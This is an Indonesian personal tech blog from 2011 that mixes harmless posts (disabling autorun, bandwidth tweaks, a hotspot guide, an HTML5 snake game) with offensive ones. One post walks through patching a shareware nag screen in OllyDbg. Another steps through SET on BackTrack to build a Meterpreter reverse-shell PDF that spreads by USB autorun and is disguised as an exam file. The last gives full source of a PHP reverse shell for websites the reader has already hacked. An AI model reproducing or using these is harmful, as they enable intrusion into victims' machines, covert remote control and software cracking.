Pages

Sabtu, 03 September 2011

disable autorun.inf hindari virus

Ada perbedaan antara Autoplay dan Autorun. Autoplay adalah ketika Anda memasukkan CD / DVD atau USB flash drive, Anda mendapatkan kotak dialog yang menanyakan apa yang ingin Anda lakukan Windows, sedangkan autorun akan langsung mengeksekusi perintah yang ada di file autorun.inf. dan ketika ini berjalan tidak ada sama sekali kesempatan bagi Anda untuk membatalkan autorun.
Cara menonaktifkan autorun.
Langkah 1 : Click Start->Run atau tekan tombol Window + R pada keyboard untuk menampilkan kotak dialog Run.
Langkah 2 : Ketik regedit lalu tekan Enter untuk menjalankan Registry Editor.
Langkah 3 : Pada kiri, panel klik ganda folder untuk memperluas dan pergi ke
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Langkah 4 : Pada panel sebelah kanan double klik NoDriveTypeAutoRun
Langkah 5 : Pada Value Data , ketik FF untuk Heksadesimal atau 255 untuk nilai desimal.
Langkah 6 : Tutup Registry Editor dan restart komputer.
Cara menonaktifkan autorun dengan Notepad
Berikut ini adalah kunci registri yang bisa Anda gunakan untuk mem blok autorun.inf. Buka notepad atau teks editor lainnya, salin teks di bawah ini dan simpan sebagai NoAutoRun.reg. Pastikan save dengan ekstensi . Reg bukan. Txt.
REGEDIT4
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionIniFileMappingAutorun.inf]
@ = “@ SYS: DoesNotExist”
Jalankan file tersebut, klik Yes jika ada konfirmasi.
Masalah dengan hack ini adalah bahwa installer CD atau DVD tidak akan lagi berjalan secara otomatis, anda harus mencari file setup dengan manual. tapi saya pikir bukanlah masalah besar dibandingkan dengan jika terinfeksi oleh virus dan harus menghabiskan berjam-jam membersihkannya.

daftar web hack

Berikut adalah List Situs Hacker Indonesia:
  1. www.binushacker.net
  2. www.jasakom.com
  3. www.echo.or.id
  4. www.kecoak.org
  5. www.devilzc0de.org
  6. www.spyrozone.net
  7. www.yogyacarderlink.web.id
  8. www.nyit-nyit.net
  9. www.indonesianhacker.or.id
  10. www.muslimhacker.net
  11. www.sekuritionline.net
  12. www.exploit-id.com
  13. www.surabayahackerlink.org
  14. www.xcode.or.id
  15. www.hacker-newbie.org
Berikut ini adalah daftar website hacker luar negeri / List site hacker / list site hacking / list web hacker / list web hacking / list website hacker / list website hacking / list site cracker / list site cracking / list web cracker / list web cracking / list website cracker / list website cracking around the world.
Tambahan List Situs Hacker Luar Negeri:
  1. www.packetstormsecurity.org
  2. www.phrack.org
  3. www.blackhat.com
  4. www.hackforums.net
  5. www.hackinthebox.org
  6. www.securityxploded.com
  7. www.hackaday.com
  8. www.darknet.org.uk
  9. www.securiteam.com
  10. www.seclist.org
  11. www.metasploit.com
  12. www.backtrack-linux.org
  13. www.secmaniac.com
  14. www.irongeek.com
  15. www.hak5.org

cracking software message box

Tool On Demand :
  1. Ollydbg, bisa Anda dapatkan di www.ollydbg.de.
  2. File target “Target.exe” telah disertakan bersama artikel ini atau kunjungi website Saya di www.mrhpx.co.nr (Saya membuatnya secara pribadi untuk menghindari pelanggaran UU Hak cipta dan DMCA yang menyebalkan!)
  3. Pengetahuan tentang Assembly (Tidak tahu sama sekali juga tidak masalah :D )
  4. Red Palmall.. (Untuk motivasi dan Inspirasi.. Serta membantu meningkatkan pendapatan pajak pemerintah Republik Indonesia :D )
  5. Padi – Tempat Terakhir.mp3.. (Lagu yang bagus, untuk mengupdate database musik dan jiwa, ingat jangan membeli bajakan! :D )

Target Description
Karakter target seperti yang telah disebutkan diatas adalah menampilkan Nagscreen atau MessageBox di awal software dijalankan. Untuk menghilangkan tampilan Nagscreen MessageBox, user harus melakukan pembelian.
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Screenshot NagScreen
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Tugas yang harus dikerjakan disini adalah menonaktifkan MessageBox atau kotak dialog pesan. Sehingga software tidak akan menampilkan MessageBox lagi diawal software dijalankan untuk selamanya.
Tidak ada hal yang lebih menyenangkan di bidang keamanan komputer selain melakukan analisa Reverse Engineering file Binary. Rekan-rekan yang penasaran terhadap isu Deface Website, Rootkit, Software Cracking, Penetrasi Sistem, DDoS, Buffer Overflow dan sejenisnya wajib mempelajari Reverse Engineering. Dari bidang inilah semua isu security berasal, baik mengenai Exploit, Vulnerable atau Bugs Sistem dan lain sebagainya. Sebelum membaca lebih lanjut Saya sangat merekomendasikan kepada Anda untuk membaca artikel Saya yang berjudul “Tutorial Injeksi Executable – Bagian 1 : MessageBox” dan “Tutorial Injeksi Executable-Bagian 2-Splash Screen” kedua artikel tersebut bisa membantu Anda dalam memahami dasar Reverse Engineering jika Anda menemui kesulitan saat membaca artikel ini.

The Beginning
Jalankan Ollydbg kemudian load “Target.exe”.. Tampilan akan terlihat seperti pada Screenshot dibawah ini. Khusus bagi Anda yang termasuk dalam tingkatan bukan newbie, disini Anda tentu sudah bisa membaca Entry Point (EP) dan menentukan langkah untuk mematahkan proteksi.
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Screenshot Load Target
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
CATATAN : Address yang terdapat pada komputer Anda mungkin berbeda dengan yang terdapat pada artikel ini. Selalu ikuti Address pada komputer Anda.
Pada layar utama, Klik kanan->Search for->All referenced text strings. Setelah itu Anda akan berada pada jendela baru yang menampilkan bermacam-macam string, coba cari dan arahkan mouse Anda pada string yang bertuliskan “Software SHAREWARE KEREN #1 di Dunia dan Alam Bawah Sadar”, lalu klik ganda atau tekan enter.
Anda akan kembali lagi menuju jendela utama, coba Anda arahkan mouse satu baris ke atas tepatnya alamat 1314156F di instruksi “6A 24” atau “PUSH 24”. Anda akan menjumpai tanda panah berwarna merah “Conditional Jump” atau “Lompatan Dengan Memperhatikan Kondisi” yang berasal dari alamat 13141533 “EB 3A”.
MessageBox (Win32 Programmer’s Reference)
Fungsi MessageBox menciptakan, menampilkan dan mengoperasikan sebuah dialog pesan. Dialog pesan berisi suatu gambaran-aplikasi pesan dan judul, ditambah berbagai kombinasi dari tombol tekan dan ikon yang dikenal.
Info
Windows NT : Yes
Win95 : Yes
Win32s : Yes
Import Library : user32.lib
Header File : winuser.h
Unicode : WinNT; Win95
Platform Notes : None
Syntax
int MessageBox(
HWND hWnd, // handle of owner window
LPCTSTR lpText, // address of text in message box
LPCTSTR lpCaption, // address of title of message box
UINT uType // style of message box
);
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Screenshot Assembly Code
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Logical, Analyze, ATTACK.. CRACKadabra!™
Saat software dijalankan akan langsung menuju ke alamat 13141533 “EB 3A”. Yang berfungsi untuk menjalankan instruksi di alamat 1314156F “PUSH 24” yang berisi Nagscreen atau MessageBox. Di alamat 13141586 “CMP EAX,7” software melakukan pemeriksaan, yaitu :
  1. Jika user menekan “No” alamat 13141589 “JE SHORT TARGET.1314158D” maka kode akan mendarat di alamat 1314158D “PUSH 0” yang akan menyebabkan software exit.
  2. Sedangkan jika user menekan “Yes” alamat 1314158B “JMP SHORT TARGET.13141594” maka kode akan mendarat di alamat 13141594 “PUSH 0” yang akan menyebabkan software berjalan secara normal.
Dari data analisa diatas, maka bisa disimpulkan beberapa metode yang bisa dipakai untuk menonaktifkan Nagscreen atau MessageBox. Saya bukan tipe Hacker yang pelit ataupun tipe Hacker bego dan matre yang suka menjual teknik Hacker yang cepat basi, seperti kebanyakan buku Hacker mahal yang sering Anda temukan di toko buku online dan offline di sekitar Anda. Saya tidak ingin hanya memberikan satu metode saja, Saya lebih menyukai memberi Anda beberapa metode dalam pemecahan permasalahan. Orang yang hanya memiliki satu metode strategi dalam menghadapi lawan adalah orang yang cukup konyol. Beberapa metode yang bisa dipergunakan, yaitu :
  1. Metode 1 – JUMP
  2. Merubah lompatan, cara ini adalah cara paling efektif dan efisien. Yaitu merubah arah tujuan dari lompatan instruksi, teknik ini hanya memerlukan perubahan nilai 1 byte saja!
    $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Screenshot Method 1 – JUMP $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
    Untuk menerapkan teknik ini cukup mudah, pada alamat 13141533 “JMP SHORT TARGET.1314156F”, rubahlah nilai “EB 3A” menjadi “EB 5F”. Hal ini akan membuat software tidak menghiraukan kode Nagscreen atau MessageBox dan langsung menuju alamat 13141594 “PUSH 0” untuk menjalankan program secara normal.. TANPA NAGSCREEN!
  3. Metode 2 – NOP
  4. Meniadakan proses instruksi, cara ini adalah cara efektif namun kurang efisien mengingat banyak terbentuknya Code Cave. Yaitu dengan meniadakan beberapa instruksi dengan cara merubahnya sebagai instruksi yang tidak dijalankan.
    $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Screenshot Method 2 – NOP $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
    Untuk menerapkan teknik ini, cukup blok dengan cursor dari alamat 1314156F “PUSH 24” sampai dengan 13141581 “CALL <JMP.&USER32.MESSAGEBOXA>” (Referensi lihat Screenshot Assembly Code). Kemudian Klik kanan->Binary->Fill with NOPs. Hal ini akan membuat software tidak lagi mempunyai Nagscreen atau MessageBox, meskipun instruksi pemeriksaan masih ada namun tidak mempengaruhi kinerja software. Dengan begitu software akan menuju alamat 13141594 “PUSH 0” untuk menjalankan program secara normal.. TANPA NAGSCREEN!
Final Notes
Tugas sudah berhasil dikerjakan dengan baik, software “Target.exe” tidak lagi menampilkan Nagscreen atau MessageBox. Mudah bukan? Tidak sampai 1 Menit, Nagscreen berhasil dilumpuhkan. Software “Target.exe” hanyalah salah satu contoh nyata dari bugs shareware karena kelalaian Programmer (Mungkin saja programmernya dulu kuliah di jurusan ilmu manajemen dan kesehatan hewan seperti Saya, jadi sedikit lupa tentang cara pemrograman yang tepat :D ). Kenapa bisa begitu? Karena teknik diatas memakai “Text String” sebagai acuan.
Jika saja software tersebut menggunakan teknologi seperti obfuscation atau menyembunyikan string tentunya tidak akan semudah ini berhasil dilumpuhkan. Percaya atau tidak, hampir sekitar 70% software shareware di seluruh dunia menggunakan Nagscreen atau MessageBox dan menampilkan Text String! Terutama software shareware produksi dalam negeri! Saya yakin Anda bisa membayangkan betapa rumitnya hidup sebagai programmer dengan resiko software mereka dibajak. Saran untuk Anda, jangan pernah mempergunakan software bajakan. Jika Anda belum memiliki uang, menabunglah, belilah lisensi resmi jika sudah memiliki uang atau pergunakan Open Source. Programmer juga butuh makan, mereka menjual software agar bisa mendapatkan penghasilan. Hacker terlahir untuk membantu sesama, bukan merugikan sesama. Semoga artikel Saya bermanfaat bagi Anda dan dapat membantu Anda mengamankan diri dari kejahatan cyber. I am a Hacker.. I am a Cracker.. But I am still a Farmer! :)

Rabu, 31 Agustus 2011

Hacking Windows Dengan BackTrack SET & USB

Tools yang digunakan : SET (Social Engineering Toolkit)
O.S yang digunakan : Backtrack 5
Victim O.S : Windows XP SP3 (fungsi autorun = on)
Hacking Windows Dengan BackTrack SET & USB
Seperti yang kita ketahui bahwa akhir-akhir ini USB benar-benar amat sangat populer penggunaannya di semua kalangan masyarakat…
Ketika saya masih nge-kost, kadang saya mendengar tetangga sebelah saya bilang sama tetangga sebelahnya lagi “Eh, gue copy dong lagu yang kemaren itu…nih USB nya, ntar kalo udah beres copy lo kasih tau gue aja ya“.
Sebenarnya apakah mungkin melakukan serangan terhadap komputer lainnya hanya dengan menggunakan USB?? jawabannya kita lihat langkah-langkah berikut dibawah ini :
Persiapan :
1. SET
2. O.S(saya pake backtrack 5 yang udah include di dalemnya semua toolsnya)

Keterangan :

Tulisan Berwarna Merah = command line
Langkah-langkahnya :
1. Buka console backtrack (CTRL+ALT+T) lalu masuk ke folder /pentest/exploits/set.
cd /pentest/exploits/set
2. Jalankan Social Engineering Toolkit dengan perintah ./set.

3. Pilih Nomor 3 “Infectious File Generator” lalu pilih nomor 1 “File Format Exploit“, dan selanjutnya masukkan IP address penyerang(komputer kita)

4. Pilih format exploit yang hendak digunakan…disini saya gunakan menggunakan “Adobe PDF Embedded EXE social engineering“.
5. Langkah berikutnya yaitu memilih file PDF yang akan digunakan untuk menyerang.

Kalau kawan-kawan punya file PDF sendiri, itu jauh lebih bagus soalnya begitu si korban buka dia ngga terlalu curiga, jadi disini kita pilih nomor 1.
6. Langkah berikutnya adalah memilih payload atau apa yang ingin kita dapat dari korban jika ia meng-klik exploit yang kita buat. Disini saya memilih nomor 2 “Windows Meterpreter Reverse_TCP shell
7. Berikutnya adalah melakukan setting connect back, maksudnya adalah ketika exploit berhasil dijalankan, pada port berapakah kita akan menangkap koneksi tersebut? disini saya gunakan port 80(kenapa harus port 80? nanti lihat di sumber aja ya)

8. Ketika muncul pertanyaan “Do you want to create a listener right now? [yes|no]” pilih YES.
9. Semua file yang berhasil di-generate oleh SET tersimpan pada folder /pentest/exploits/set/autorun, tetapi nama file tersebut agak mencurigakan & kurang menarik sehingga lebih baik jika kita rubah terlebih dahulu penamaan file tersebut.
masuk ke folder autorun :
cd /pentest/exploits/set/autorun
10. Lakukan perintah ini
pico autorun.inf
11. Didalam file autorun.inf, rubah template.pdf menjadi nama file yang menarik agar korban mau membuka file tersebut. Berikut adalah isi autorun.inf yang saya buat :
[autorun]
open=Soal_UAS_2011_Aljabar.pdf
icon=autorun.ico

Lalu tekan CTRL + O untuk melakukan SAVE dan CTRL + X untuk keluar.
12. Langkah selanjutnya adalah menamai template.pdf menjadi nama yang telah kita definisikan pada autorun.inf dengan perintah mv.
mv template.pdf Soal_UAS_2011_Aljabar.pdf
13. Selesai sudah, selanjutnya tinggal meng-copy kan semua file yang ada dalam folder autorun tersebut ke dalam USB anda.
14. Ketika victim mencolokkan USB dan autorun komputernya dalam keadaan aktif, maka ia akan otomatis membuka file PDF yang tadi telah kita buat.
15. Ketika ia meng-klik OK untuk setiap alert yang muncul, maka :

Sukses!
FAQ :
Q : Lalu bagaimana kalau ternyata autorun komputer victim dalam keadaan dimatikan??
A : Sifat manusia itu biasanya ingin tahu & penasaran, pasti segala cara akan ia lakukan agar PDF tersebut terbuka apalagi setelah tahu bahwa Title PDF nya memang penting & menarik untuknya.
Penanggulangan :
1. Ketika muncul suatu alert atau hal-hal yang tidak wajar saat membuka suatu file dengan ekstensi tertentu, lebih baik batalkan/cancel saja jangan diteruskan.
2. Matikan autorun / autoplay

Rabu, 24 Agustus 2011

Mempercepat Koneksi Internet dengan Mengubah Setting Bandwidth pada Windows


Cara mempercepat Koneksi internet? Mungkin banyak yang belum tahu jika bandwidth untuk koneksi internet dalam sistem operasi Windows ini dibatasi sebanyak 20 persen dari total bandwidth. Nah, untuk menghilangkan pembatasan bandwidth yang dimiliki oleh Windows ini, Anda bisa melakukan beberapa tips berikut.

- Klik tombol 'Start' pada Windows.

- Klik 'Run' dan ketikkan gpedit.msc pada kolom kosong, lalu klik 'OK'

- Pilih 'Administrative Templates', lalu klik 'Network'

- Setelah terbuka klik 'QoS Packet scheduler'

- Ubah setting pada 'Limit Reservable Bandwidth' menjadi Enable.

- Ubah Bandwidth Limitnya, dari 20 menjadi 0, lalu Klik Apply - OK.

- Keluar, lalu Restart komputer.

Semoga bermanfaat...

dhonydota.blogspot.com

lock PC with FD



FLASHDISK atau media penyimpanan lain melalui port USB dapat digunakan sebagai sebuah alat untuk security atau keamanan
PREDATOR adalah software untuk mengunci PC Anda ketika Anda pergi, bahkan jika sesi windows anda masi terbuka.Dengan menggunakan perangkat USB flashdisk anda dapat mengunci komputer anda dan akan bekerja sebagai berikut :

  • Masukkan USB flashdisk anda ke port USB komputerAnda
  • Jalankan program PREDATOR (atau anda dapat menggunakan auto start) yang telah anda install
  • Lakukan pekerjaan anda pada komputer
  • Ketika anda harus meninggalkan komputer anda untuk melakukan sesuatu kegiatan dan akan melanjutkan kembali, anda tidak perlu mematikan komputer anda dan menutup segala pekerjaan anda, cukup dengan mencabut USB flashdisk anda.
  • Bila anda mencabut perangkat USB flashdisk anda, Keyboard dan mouse otomatis tidak dapat digunakan, dan layar monitor akan blank gelap.
  • Saat anda kembali untuk melakukan pekerjaan anda pada komputer, masukkan USB Flashdisk anda ke port USB tadi, maka Layar komputer akan tampil kembali, dan mouse serta keyboard akan aktif.
Lebih mudah dan lebih cepat daripada Anda menutup sesi Windows, karena Anda tidak perlu mengetik ulang password anda ketika anda kembali.
Advanced Security Features:
  • Lindungi komputer dengan flash drive tunggal. PREDATOR dapat mengirim pesan peringatan melalui Email atau SMS.
  • PREDATOR mencatat semua kejadian yang berhubungan dengan keamanan dalam file log: mulai, alarm, stop. Dengan membaca log ini, Anda akan tahu jika penyusup telah mencoba menggunakan komputer Anda saat Anda telah pergi.
  • PREDATOR dapat mereplikasi log ini di akun Twitter Anda, memungkinkan Anda untuk jarak jauh memonitor semua aktivitas akses-kontrol pada PC Anda.
  • PREDATOR melakukan perubahan kode keamanan yang tercatat pada drive USB anda. Jika seorang penyusup berhasil untuk mengkopy flashdisk Anda, ini tidak akan bekerja karena kode pada flashdisk Anda sendiri akan berubah untuk sementara.
  • PREDATOR Menonaktifkan tugas Windows manager ketika Anda mencabut USB drive. Tidak ada yang dapat menghentikannya dengan Ctrl-Alt-Del.
  • PREDATOR memungkinkan Anda mendapatkan kembali kontrol dari komputer Anda jika Anda kehilangan flashdisk : ketika Anda mulai perangkat lunak untuk pertama kalinya, Anda menetapkan sandi yang akan membuka sesi Anda jika USB drive anda hilang atau rusak
  • PREDATOR dapat membunyikan alarm yang dapat didengar jika seseorang ingin menggunakan komputer dengan memasuki password tidak benar.
  • Dan PREDATOR dapat melindungi beberapa PC dengan USB flash drive yang sama, misalnya untuk komputer rumah anda dan komputer kantor.
Dengan PREDATOR, keamanan adalah yang sederhana seperti memasukkan atau mengeluarkan USB stick.
Berminat?
Ada dua versi predator, Versi free dan versi Professional Editions, dimana untuk versi Professional Editions anda harus membeli lisensinya, lihat gambar tabel perbedaan antara versi free dan Professional Editions

Kedua2nya dapat dignakan pada
Windows XP SP3
Windows Server 2003
Windows Server 2008
Windows Vista
Windows 7
Download versi free
Untuk Windows 32 Bit
Untuk Windows 64 Bit
Untuk versi Professional Editions anda dapat mengklik link Home Page

Membuat Hotspot / Access Point Di Laptop







 
Dengan banyaknya pilihan operator yang tersedia saat ini, semakin mempermudah setiap orang untuk dapat koneksi internet murah. Nah, terkadang ada pemikiran bagaimana menjadi lebih murah dan efektif untuk memanfaatkan 1 USB Modem yang dimiliki sehingga dapat dipakai sebagai koneksi internet yang dapat dibagi pakai (sharing). Atau kalau bahasa internetnya adalah menjadikan Laptop yang memiliki USB Modem difungsikan sebagai Access Point / Hotspot. Bagaimana caranya ?
Ternyata dengan Ubuntu sangat mudah, sbb. :
1. Klik Icon Network Manager, kemudian pilih / klik Create New Wireless Network

2. Isikan Network Name, Pilih Wireless Security dan isikan Passowrd Key-nya

Nama Network saya isi : Wifi1, Wireless Securities pilih : “WEP 40/128-bit Key” (agar wireless juga bisa diakses oleh Windows) dan password sesuai keinginan. Klik Create. Sampai disini Anda telah sukses membuat Wireless Network dan setelah beberapa saat sistem Ubuntu akan menyampaikan informasi bahwa Wireless Network sudah Connect seperti terlihat pada gambar :

3. Pada Laptop yang lain (Ubuntu Sabily) saya akan mendemonstrasikan cara koneksinya. Klik Icon Network Manager. Dapat dilihat bahwa terdapat koneksi yang bisa digunakan (available) yaitu Wifi1. Klik Wifi1 …

4. Akan muncul kotak dialog : Wireless Securities dan Password Key, agar dipilih dan diisikan seperti data di atas, kemudian klik Connect … Nah Laptop sudah connect ke Internet melalui Wifi1 dan silakan berselancar.

5. Jika besok hari berikutnya akan mengaktifkan Wifi1 kembali, tidak perlu membuat koneksi baru, namun cukup klik Network Manager –> Create New Wireless Network. Pada Connection pilih Nama Wifi di atas (biasanya minta password user) –> klik Create

Semoga informasi ini bermanfaat :)

game snake with HTML5

<!documentTYPE html>
<html lang=”en”>
<head>
<meta charset=”utf-8″ />
<title>Play Snake Game</title>
<style type=”text/css”>
body {text-align:center;}
canvas { border:5px dotted #ccc; }
h1 { font-size:50px; text-align: center; margin: 0; padding-bottom: 25px;}
</style>
<script type=”text/javascript”>
function play_game()
{
var level = 160; // Game level, by decreasing will speed up
var rect_w = 45; // Width
var rect_h = 30; // Height
var inc_score = 50; // Score
var snake_color = “#006699″; // Snake Color
var ctx; // Canvas attributes
var tn = []; // temp directions storage
var x_dir = [-1, 0, 1, 0]; // position adjusments
var y_dir = [0, -1, 0, 1]; // position adjusments
var queue = [];
var frog = 1; // defalut food
var map = [];
var MR = Math.random;
var X = 5 + (MR() * (rect_w – 10))|0; // Calculate positions
var Y = 5 + (MR() * (rect_h – 10))|0; // Calculate positions
var direction = MR() * 3 | 0;
var interval = 0;
var score = 0;
var sum = 0, easy = 0;
var i, dir;
// getting play area
var c = document.getElementById(‘playArea’);
ctx = c.getContext(’2d’);
// Map positions
for (i = 0; i < rect_w; i++)
{
map[i] = [];
}
// random placement of snake food
function rand_frog()
{
var x, y;
do
{
x = MR() * rect_w|0;
y = MR() * rect_h|0;
}
while (map[x][y]);
map[x][y] = 1;
ctx.fillStyle = snake_color;
ctx.strokeRect(x * 10+1, y * 10+1, 8, 8);
}
// Default somewhere placement
rand_frog();
function set_game_speed()
{
if (easy)
{
X = (X+rect_w)%rect_w;
Y = (Y+rect_h)%rect_h;
}
–inc_score;
if (tn.length)
{
dir = tn.pop();
if ((dir % 2) !== (direction % 2))
{
direction = dir;
}
}
if ((easy || (0 <= X && 0 <= Y && X < rect_w && Y < rect_h)) && 2 !== map[X][Y])
{
if (1 === map[X][Y])
{
score+= Math.max(5, inc_score);
inc_score = 50;
rand_frog();
frog++;
}
//ctx.fillStyle(“#ffffff”);
ctx.fillRect(X * 10, Y * 10, 9, 9);
map[X][Y] = 2;
queue.unshift([X, Y]);
X+= x_dir[direction];
Y+= y_dir[direction];
if (frog < queue.length)
{
dir = queue.pop()
map[dir[0]][dir[1]] = 0;
ctx.clearRect(dir[0] * 10, dir[1] * 10, 10, 10);
}
}
else if (!tn.length)
{
var msg_score = document.getElementById(“msg”);
msg_score.innerHTML = “Thank you for playing game.<br /> Your Score : <b>”+score+”</b><br /><br /><input type=’button’ value=’Play Again’ onclick=’window.location.reload();’ />”;
document.getElementById(“playArea”).style.display = ‘none’;
window.clearInterval(interval);
}
}
interval = window.setInterval(set_game_speed, level);
document.onkeydown = function(e) {
var code = e.keyCode – 37;
if (0 <= code && code < 4 && code !== tn[0])
{
tn.unshift(code);
}
else if (-5 == code)
{
if (interval)
{
window.clearInterval(interval);
interval = 0;
}
else
{
interval = window.setInterval(set_game_speed, 60);
}
}
else
{
dir = sum + code;
if (dir == 44||dir==94||dir==126||dir==171) {
sum+= code
} else if (dir === 218) easy = 1;
}
}
}
</script>
</head>
<body onload=”play_game()”>
<h1>Play Snake Game</h1>
<div id=”msg”></div>
<canvas id=”playArea” width=”450″ height=”300″>Sorry your browser does not support HTML5</canvas>
</body>
</html>

Reverse Connecting Shell di PHP


Rootshell adalah impian semua hacker. Biasanya seorang hacker yang masuk melalui web vulnerability, akan mengupload webshell. Dengan webshell si hacker bisa mengeksekusi command shell melalui request HTTP. Namun webshell tetaplah bukan true shell, webshell memiliki banyak keterbatasan, salah satunya adalah sifatnya yang tidak interaktif.
Dalam artikel ini saya akan menjelaskan bagaimana caranya mendapatkan true shell yang interaktif dari suatu website yang berhasil dihack. Dari shell tersebut saya juga memperlihatkan contoh eksploitasi lokal untuk meningkatkan privilege dari user biasa (apache) menjadi root dan mensetup sebuah backdoor sehingga si hacker kapan saja bisa mendapatkan rootshell.

Reverse Shell PHP di Linux
Saya memakai reverse shell php dari situs pentestmonkey.net dalam artikel ini. Reverse shell tersebut dibuat murni dalam PHP namun hanya bekerja untuk OS berbasis UNIX seperti Linux. Saya sudah mencoba untuk memodifikasi reverse shell tersebut untuk bekerja di windows, namun belum berhasil, jadi untuk Windows saya akan pakai pendekatan lain yang tidak murni PHP.
Reverse shell tersebut memiliki dua konfigurasi yang dihard-coded ke dalam file phpnya, yaitu IP address dan port server yang akan dihubungi oleh reverse shell ini. Agar lebih fleksibel saya mengubah dua variabel tersebut menjadi mengambil nilai dari parameter GET.
set_time_limit (0);
$VERSION = "1.0";
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
Ubah dua baris yang mengandung variabel $ip dan $port menjadi seperti di bawah ini.
set_time_limit (0);
$VERSION = "1.0";
$ip = $_GET["ip"];
$port = $_GET["port"];
$chunk_size = 1400;
Jadi source code lengkap rs.php adalah sebagai berikut:
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = $_GET["ip"]; 
$port = $_GET["port"]; 
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = '/bin/bash -p -i';
$daemon = 0;
$debug = 0;
 
if (function_exists('pcntl_fork')) {
	// Fork and have the parent process exit
	$pid = pcntl_fork();
 
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
 
	if ($pid) {
		exit(0);  // Parent exits
	}
 
	// Make the current process a session leader
	// Will only succeed if we forked
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}
 
	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}
 
// Change to a safe directory
chdir("/");
 
// Remove any umask we inherited
umask(0);
 
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}
 
// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);
 
$process = proc_open($shell, $descriptorspec, $pipes);
 
if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}
 
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
 
printit("Successfully opened reverse shell to $ip:$port");
 
while (1) {
	// Check for end of TCP connection
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}
 
	// Check for end of STDOUT
	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}
 
	// Wait until a command is end down $sock, or some
	// command output is available on STDOUT or STDERR
	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
 
	// If we can read from the TCP socket, send
	// data to process's STDIN
	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}
 
	// If we can read from the process's STDOUT
	// send data down tcp connection
	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}
 
	// If we can read from the process's STDERR
	// send data down tcp connection
	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}
 
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
 
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
	if (!$daemon) {
		print "$string\n";
	}
}
?>

Software Protokol Jaringan



1. Sistem operasi jaringan

Os jaringan yang muncul pertama kali adalah SO Unix pada tahun 1969 diperusahaan AT & T. Sekarang sudah banyak sistem operasi jaringan bahkan Microsoft mempunyai sistem operasi yang memiliki rancangan dasar seperti unix yaitu Windows NT. Syarat utama suatu OS dapat menjamin SO jaringan adalah :
- Stabil
- Aman
- Mendukung jaringan secara Native
- Multi User
- Dapat melakukan operasi multitasking
- Dapat mendukung penggunaan hardware dalam skala besar


2. Protocol

Protocol dapat disebut bahasa komunikasi antar komputer dalam jaringan, di bawah ini macam - macam protocol:
a. Net Beui
Net Beui merupakan protocol yang banyak digunakan dalam jaringan lokal berbasis SO windows. Protocol ini sangat baik dan cepat untuk bersharing data namun protocol ini tidak dapat dirouting.
b. IPx & SPx ( Internetwork paket exchange / Sequnce paket exchange )
Protocol hampir sama bahkan mirip dengan NetBeui hanya saja perbedaanya protocol ini dapat di routing jadi dapat memungkinkan terjadinya MAN.
c. Protokol yang dikembangkan oleh OSI / ISO
Protocol ini sudah digunakan oleh beberapa institusi, sayangnya segala informasi tantang protocol ini harus debeli melaui ISO dan hal ini yang menyebabkan perkembangan ISO'OSI menjadi Lambat.
d. TCP / IP ( Transmition Control Protocol / Internet Protocol )
TCP / IP adalah protocol yang digunakan di jaringan global karena memiliki sistem pengalamatan yang baik dan memiliki sistem pengecekan data. saat ini terdapat 2 versi TCP/IP yang berbeda dalam sistem penomoran, yaitu IPv4 ( 32 bit ) dan IPv6 ( 128 bit ).

Ciri - ciri yang terdapat di protol TCP/IP adalah :
- standard protocol TCP/IP dalam bentuk RFC dapat diambil oleh siapapun tanpa biaya.
- tidak tergantung pada sistem operasi atau hardware tertentu.
- pengembangannya berdasarkan consensus dan tidak tergantung pada vendor tertentu
- dapat digunakan hampir di semua perangkat transmisi
- pengalamatan bersifat unix dalam skala global
- memiliki banyak layanan dan bisa ditetapkan pada internetwork


Dalam dunia internet tidak ada suatu badanpun yang berhak mengatur jalannya internet secara umum. Ada lembaga khusus yang menangani protocol yaitu :
